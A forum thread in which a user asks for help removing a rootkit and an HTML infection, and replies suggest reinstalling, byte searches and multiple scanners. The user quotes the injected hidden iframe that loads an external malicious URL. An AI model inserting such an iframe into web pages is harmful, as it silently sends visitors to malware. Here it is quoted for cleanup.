Help removing malware/viruses "http://jL.chura.pl/rc/"

[Workaholic]

Okay long story short, about 2 months ago my computer suffered a large virus attack from a roofkit virus thingy, AVG 8 however couldn't detect (as updating from the FREE 7.5 copy to 8.0, removes the required features and there weren't any prompts.) Then using a magnitude of AV software on windows based boot disk, ClamAV from Ubuntu, some of the viruses were removed but not all.

The above steps then made the system under windows unusable and so from Ubuntu live CD I backed up everything to DVD's, CD's and a spare 80GB HDD. All executable (exe, bat) files were removed and the only files going to the HDD were audio, video and a number of documents.

Removed all attached devices after using the shred command in Ubuntu to write over all of the space of the drive 3 times which took 2.5 days, I installed windows XP. Then using a disc created in Ubuntu tried to installed Avira AV, but couldn't as I hadn't installed the network card's drivers. so used Comodo instead. Once installed I set it to scan, nothing viruses found - perfect! I then installed Avira AV and again on the newly installed OS nothing.

A couple of days later I realised I need some files off the ext HDD so plugged it in and ran Avira and Comodo AV's on it. Comodo found nothing but Avira found 6 errors. All htm hack trying to re-direct using the following code:

Code:

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Manually I edited all of these files and removed them, and again ran all AV checks, nothing found perfect...

Just to be sure I used Windows search tool to locate all htm, php and html files to make sure. Buy doing this I found another 10 files which contained the code but weren't found by any of the AV's!



Now here's the questions:
1) Are there any other file formats this code can attach to!
2) Is there any automated tool to go through these files and automatically removed the code, or anything I instruct it to remove?
3) have I made a wise decision on changing from CPU hungry AVG Free, to Comodo (set to On Demand scan) and Avira as main real time scanning

[Workaholic]

Forgot to say that the files found had about 3 pages worth of the code repeated line after line, and those that didn't had about 1 page (50 lines) or 71 pages (3500 or so....)

Kinda shows that Avira isn't perfect and may only be looking for files with a set number of malacious code!

The actual name of the virus detected was "HTML/Dldr.Iframe.KD"

[aidanjt]

A nuke 'n reinstall is the only sure way to get rid of a rootkit. This is even true for some DRM products.

[smargh]

To search for everything, perhaps use a hex editor and do actually do a byte-by-byte search for "style="display:none"></iframe>"? Might be a bit quicker than going file-by-file with search applications (especially the built-in Windows search), as they are often flakey and prone to crashing.

No AV app will detect everything. For example, here's one which started doing the rounds at my workplace last week:

http://www.virustotal.com/analisis/e...c97-1243861321

Generally, though, if I have to make sure something is clean I try to use at least three scanners - you could put trial versions into a VM as separate snapshots. Detection rates are generally very good with a combination of G-Data, Avira, BitDefender, Kaspersky and another of your choice.

By the way, make sure AutoRun/Play is disabled, as otherwise just plugging in your external HDD could have re-infected you.

As for decent AV apps, I've not yet found a good one. First I tried NOD32, but it ended up with a bad-ish detection rate at one point. Then I recently tried Avira, BitDefender and G-Data. G-Data had a superb detection rate - it found most of the mostly-undetected work viruses I make a sample of - but it slowed things down quite a lot, especially when working on VMWare OSes. They all have their own bugs and quirks.